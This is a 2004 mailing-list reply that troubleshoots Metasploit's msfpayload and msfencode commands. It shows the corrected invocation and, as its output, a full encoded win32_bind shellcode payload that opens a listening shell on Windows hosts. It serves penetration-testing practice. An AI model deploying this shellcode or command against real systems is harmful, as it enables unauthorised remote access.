msfpayload and msfencode problems

[mmiller at hick.org (mmiller at hick.org)]

On Wed, Oct 20, 2004 at 04:51:44PM +0200, sol seclists wrote:
> Having some problems with msfpayload and msfencode....
>
> msf > msfpayload win32_bind R | msfencode -t c -e ShikataGaNai -b "\x00"
> [*] Bad character list format is "\x00\x01\x02"
> msf > msfpayload win32_bind R | msfencode -t c -e ShikataGaNai -b \x00
> [*] Bad character list format is "\x00\x01\x02"
> msf > msfpayload win32_bind R | msfencode -t c -e ShikataGaNai -b '\x00'
> [*] Bad character list format is "\x00\x01\x02"
> msf > msfpayload win32_bind R | msfencode -t c -e ShikataGaNai -b "\x00\x01\x02"
> [*] Bad character list format is "\x00\x01\x02"
> msf >

My guess is that this has something to do with the fact that you're
executing this from inside msfconsole (judging from your command
prompt).

$ ./msfpayload win32_bind R | ./msfencode -t c -e ShikataGaNai -b '\x00\x0d\x0a\x7e'
[*] Using Msf::Encoder::ShikataGaNai with final size of 402 bytes
"\xdb\xd2\xbe\x26\x3f\x8f\xfd\x2b\xc9\xb1\x5f\xd9\x74\x24\xf4\x5b"
"\x83\xc3\x04\x31\x73\x13\x03\x55\x2c\x6d\x08\x65\xba\x27\xf3\x95"
"\x3b\x9b\xa6\xc3\x6c\x90\x25\xcf\x8a\x2d\xf0\x33\x20\x65\xfe\x33"
"\x37\x6c\x8b\x89\x2f\xfb\xd6\x2d\x51\x10\x05\x1f\x18\x6d\xfe\xd4"
"\x9b\x9f\xce\x15\x67\x6e\xf1\x45\xa0\x71\x85\x92\x10\xbe\x6b\x9d"
"\x55\xaa\x86\xa6\x25\x09\x73\xad\x34\xda\x21\x69\xb6\x36\xb3\xfa"
"\xb4\x83\xb7\xa6\xd8\x12\x23\xdd\xe5\x9f\xb2\x09\x0e\x9d\x85\x09"
"\x8e\xfc\xb8\xd2\xf3\x09\x43\xba\x99\x39\x1a\x26\xd5\x23\x17\xfd"
"\xe5\xd8\x7c\x1d\x7d\xc5\x09\x46\x89\xa9\x65\xf6\xc7\x43\x9a\xf9"
"\x0e\xd2\xa5\x84\x43\xe5\x28\x86\x9b\xb1\x7c\xd5\x12\xd8\x69\xfe"
"\x24\x23\x6a\x90\x24\x23\x6a\x26\x3f\x3b\x8d\xe2\x59\x4b\xb8\x0f"
"\x10\x2d\x73\x6b\xb9\x41\x43\xd7\x13\x8f\xa2\xce\x65\x25\x99\x3b"
"\x98\x39\xd9\xec\x30\xf0\x41\x21\x85\xf4\x26\xc8\xa2\xd4\x89\x2d"
"\xe3\x9c\xf5\x58\xcf\x12\x7c\x4e\xba\x2b\x26\x3f\x69\xcb\xec\x30"
"\x72\x66\x09\x17\x04\x8d\x9f\x45\xe4\xa5\xb8\xdd\xf6\x8d\x39\x88"
"\x38\xc3\x05\x62\x69\x73\xd6\xc2\xd9\x33\x86\x3d\x8c\x9f\xaf\x06"
"\x1e\x3b\xfc\xdb\x09\xb9\x03\xca\x95\x34\xe3\x86\x35\x17\xb3\xa9"
"\x63\xb3\x68\x02\x73\xee\xa6\xff\xdf\x46\x48\xaa\xff\xe1\x71\x3c"
"\x43\xbf\x39\xbc\xca\xdc\x45\x46\xfd\xe2\xc7\xca\xda\x4e\xbd\x27"
"\x7a\x7c\xe9\xc0\x86\x01\x02\x9a\xb0\x42\xff\x32\x79\x2d\x38\x76"
"\xa5\x8d\xc7\x77\x2c\x91\xe3\x3f\xa7\x16\xc8\xf3\x3e\x9a\x34\x5b"
"\xcc\x27\x11\x4b\x9a\xf7\x08\x3a\x73\xb9\xfb\xf5\x22\x68\xaf\x54"
"\x3a\xff\x4f\x3e\xb6\xfe\xe3\xa8\xc9\xaa\x07\x2b\xe5\xdc\xee\x2c"
"\x73\xdf\x86\x7f\xa5\xda\x98\x80\x03\xe1\xad\xbd\xc6\x16\x52\x77"
"\xe8\x3a\x52\x02\x16\xd5\x5d\x66\x12\x7a\x61\x23\x1f\xb5\x46\x98"
"\xe0\x65";